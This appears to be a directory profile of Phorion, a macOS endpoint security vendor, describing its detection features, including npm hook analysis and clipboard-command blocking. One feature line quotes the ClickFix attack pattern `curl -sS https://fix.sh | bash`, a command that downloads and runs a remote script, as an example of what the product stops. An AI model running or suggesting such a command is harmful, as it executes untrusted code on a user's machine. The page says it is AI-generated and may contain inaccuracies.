Skip to main content

Phorion

Phorion provides a macOS-native endpoint detection and response platform built exclusively for Apple devices, addressing the security gaps left by Windows-first EDR tools. Its single lightweight agent delivers deep behavioral detection, file access protection, and supply chain attack prevention through Apple's Endpoint Security Framework, with zero-touch deployment via any MDM.

London, United Kingdom · HQ
Founded 20222300+ followers
Updated 12 days ago

Funding

Funding not disclosed

Funding rounds are not available yet.

Founders

Founder details are not available yet.

Product

Problem

Most endpoint security tools were designed for Windows and bolted onto macOS as an afterthought, relying on signature matching and hash lookups that miss modern threats targeting Mac fleets. This leaves organizations vulnerable to ClickFix social engineering attacks, supply chain compromises through developer tools, and infostealers exfiltrating credentials and session tokens, while a patchwork of multiple security agents creates management overhead, spiraling costs, and exploitable gaps between tools.

Solution

Phorion provides a purpose-built macOS EDR platform with a single lightweight agent that delivers deep protection without the performance impact of traditional tools. The platform leverages Apple's Endpoint Security Framework (ESF) for deep telemetry and behavioral detection, enabling real-time blocking of malicious commands, clipboard-based attacks, and unauthorized file access. Phorion's research into npm lifecycle internals allows it to identify which package hook is running, which package and version are involved, and apply surgical in-line blocking that stops supply chain attacks without disrupting normal development workflows. The agent deploys zero-touch via Jamf, Kandji, or any other MDM, works out of the box with no complex configuration, and provides full transparency into gathered telemetry for analyst customization.

Target Audience

Primary customers are security teams and IT administrators managing macOS fleets in organizations that need dedicated Apple endpoint protection, including enterprises with significant Mac deployments, development teams concerned about supply chain attacks, and security operations centers seeking macOS-native visibility.

Features

  • Apple-first detection engine built exclusively for macOS using Apple's Endpoint Security Framework (ESF) for deep behavioral telemetry
  • File access protection that blocks unauthorized applications from accessing sensitive files, preventing credential theft, session hijacking, and data exfiltration without relying on brittle signatures
  • Clipboard command monitoring that detects and blocks dangerous commands from untrusted sources, such as the `curl -sS https://fix.sh | bash` pattern used in ClickFix attacks
  • npm lifecycle hook analysis that identifies which hook (`preinstall`, `postinstall`, `prepare`) is executing, which package and version are involved, and applies behavior-scoped protections against credential theft, second-stage downloads, and worm propagation
  • Single lightweight agent with minimal performance impact, deployable via Jamf, Kandji, or any other MDM with zero-touch configuration
  • Full telemetry transparency with extensibility for analysts to tailor detection and response to their specific needs
  • Live response and device isolation capabilities for incident response scenarios
  • Hash blocking and behavioral detection for threat hunting across the macOS fleet
This profile is AI-generated and may contain inaccuracies.